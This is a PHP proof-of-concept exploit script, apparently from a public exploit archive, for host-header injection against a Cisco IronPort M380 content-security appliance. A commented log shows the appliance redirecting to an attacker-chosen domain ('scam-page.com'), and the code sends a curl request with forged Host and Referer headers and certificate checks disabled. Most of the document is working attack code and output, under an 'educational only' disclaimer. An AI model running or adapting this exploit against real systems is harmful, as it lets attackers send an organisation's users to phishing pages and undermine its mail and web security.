<?php
//
// Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification Demo Exploit
//
//
// Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
//
//
// Disclaimer:
// This or previous programs are for Educational purpose ONLY. Do not use it without permission.
// The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
// caused by direct or indirect use of the information or functionality provided by these programs.
// The author or any Internet provider bears NO responsibility for content or misuse of these programs
// or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
// system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
// responsibility.
//
// Use them at your own risk!
//
//
// [test@localhost ironport]$ php -S localhost:1337 ironport_m380.php
// PHP <HIDDEN> Development Server started at Sun Sep 8 16:47:43 2019
// Listening on http://localhost:1337
// Document root is /home/test/ironport
// Press Ctrl-C to quit.
// * About to connect() to 192.168.1.1 port 443 (#0)
// * Trying 192.168.1.1... * connected
// * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
// * Initializing NSS with certpath: sql:/etc/pki/nssdb
// * skipping SSL peer certificate verification
// * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
// * Server certificate:
// * subject:
// * start date: Mar 19 00:00:00 2018 GMT
// * expire date: Mar 18 23:59:59 2020 GMT
// * common name:
// * issuer:
// > GET / HTTP/1.1
// Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
// Cache-Control: no-cache
// Content-Type: application/x-www-form-urlencoded; charset=utf-8
// Host: scam-page.com
// Referer: scam-page.com
// User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
// * HTTP 1.0, assume close after body
// < HTTP/1.0 303 Redirecting
// < Server: glass/1.0 Python/2.6.4
// < Date: Sun, 08 Sep 2019 13:47:59 GMT
// < Content-Type: text/html
// < X-Frame-Options: SAMEORIGIN
// < Set-Cookie: sid=InCkP0xGNg7fyAqL2mAO; expires=Tuesday, 10-Sep-2019 13:47:59 GMT; httponly; Path=/; secure
// < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
// < Pragma: no-cache
// < Expires: Sun, 08 Sep 2019 13:47:59 GMT
// < Last-Modified: Sun, 08 Sep 2019 13:47:59 GMT
// < Location: https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443&referrer=https%3A%2F%2Fscam-page.com%2FSearch
// <
// * Closing connection #0
// * About to connect() to 192.168.1.1 port 443 (#0)
// * Trying 192.168.1.1... * connected
// * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
// * skipping SSL peer certificate verification
// * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
// * Server certificate:
// * subject:
// * start date: Mar 19 00:00:00 2018 GMT
// * expire date: Mar 18 23:59:59 2020 GMT
// * common name:
// * issuer:
// > GET / HTTP/1.1
// Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
// Cache-Control: no-cache
// Content-Type: application/x-www-form-urlencoded; charset=utf-8
// Host: scam-page.com
// Referer: scam-page.com
// User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
// * HTTP 1.0, assume close after body
// < HTTP/1.0 303 Redirecting
// < Server: glass/1.0 Python/2.6.4
// < Date: Sun, 08 Sep 2019 13:48:00 GMT
// < Content-Type: text/html
// < X-Frame-Options: SAMEORIGIN
// < Set-Cookie: sid=NPPfo6uXJ5gPbJSPcNDE; expires=Tuesday, 10-Sep-2019 13:48:00 GMT; httponly; Path=/; secure
// < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
// < Pragma: no-cache
// < Expires: Sun, 08 Sep 2019 13:48:00 GMT
// < Last-Modified: Sun, 08 Sep 2019 13:48:00 GMT
// < Location: https://scam-page.com/login?CSRFKey=32b0b069-34bb-1fdf-9f92-2de72a24cb65&referrer=https%3A%2F%2Fscam-page.com%2FSearch
// <
// * Closing connection #0
//
$url = "https://192.168.1.1";
$fake_host = "scam-page.com";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_VERBOSE, true);
$headers = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control: public',
'Content-Type: application/x-www-form-urlencoded; charset=utf-8',
'Host: '.$fake_host,
'Referer: '.$fake_host,
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$output = curl_exec($ch);
curl_close($ch);
echo $output;